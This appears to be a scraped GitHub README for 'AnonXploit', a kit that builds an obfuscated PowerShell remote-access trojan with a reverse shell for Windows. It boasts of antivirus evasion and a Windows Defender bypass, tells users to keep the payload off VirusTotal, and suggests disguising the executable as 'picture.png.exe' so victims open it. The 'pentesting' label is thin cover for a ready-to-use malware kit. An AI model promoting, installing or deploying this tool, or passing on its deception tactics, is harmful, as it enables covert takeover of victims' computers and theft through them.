gsociety0 / AnonXploit

Windows RAT w/ antivirus bypass.

Home Page:https://github.com/gsociety0/AnonXploit

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

logo

Open Source Love License: GPL v3

AnonXploit is a pentesting tool, that create a Powershell RAT. It can be used by organizations of all sizes, including individuals.

It was developed with the purpose of exploiting the vulnerability of creating a reverse shell between the pentester and the injected computer. This tool can work without warnings about viruses and suspicious connections.



💻 Supported Operating Systems

Operating systems CPU Architect

We carried out the tests on systems based on Ubuntu, Debian and Termux. We believe it will also work on other systems, such as Fedora and Arch. The installation instructions are for Ubuntu/Debian and Termux only. If you don't know how to install on other operation system, google it.


🔨 Installation

Installation for Debian/Ubuntu

System Update
sudo apt update
Install Git
sudo apt install -y git
Download the Repository
git clone https://github.com/gsociety0/AnonXploit.git
Install AnonXploit
bash ./install

Installation for Termux

System Update
pkg update
pkg upgrade -y
Install Git
pkg install -y git
Install Python3
pkg install -y python python-pip
Download the Repository
git clone https://github.com/gsociety0/AnonXploit.git
Install AnonXploit
bash ./install

📡 How to Use

To create the RAT you need to run two programs, client.py and server.py. Where the client will automatically create the RAT, and the server will wait for the connection.

client.py
python3 client.py
server.py
python3 server.py

🪝 Social Engineering

(Ethically speaking) You need the other person to perform the RAT, for this, you can use Social Engineering (S.E) techniques. One of the ways that can be used is to convert this file into an Executable (.EXE), name it "picture.png.exe", define an icon of a photograph and send it to the person, making it appear that it is a photograph. Now, you study the situation and act in the best way possible.


☑️ Code Analysis

If you check the source code of the two main files (client.py/server.py) of AnonXploit file, you will notice that the code is obfuscated. This is done for security reasons and compatibility with WSL (Windows Subsystem for Linux), where the antivirus detected the files as viruses and deleted them.

🏛️ RAT Architecture


🔬 Virus Total

install file:


client.py file (91% undetectable):


server.py file:



DON'T UPLOAD THE RAT FILE TO VIRUS TOTAL!

The RAT bypasses Windows Defender antivirus. (Information verified until 1/28/2024)

"Files and URLs sent to VirusTotal will be shared with antivirus vendors and security companies..."

Source: Wikipedia

©️ License

This project is licensed under the GNU Affero General Public License v3.0

✅ Permission:

  • Patent use;
  • Commercial use;
  • Private use;
  • Distribution;
  • Modification.
  • ✒️ Conditions:

  • Same license;
  • Disclose source;
  • License and copyright notice;
  • Network use is distribution;
  • State changes.
  • ⚠️ Limitations:

  • Liability;
  • Warranty.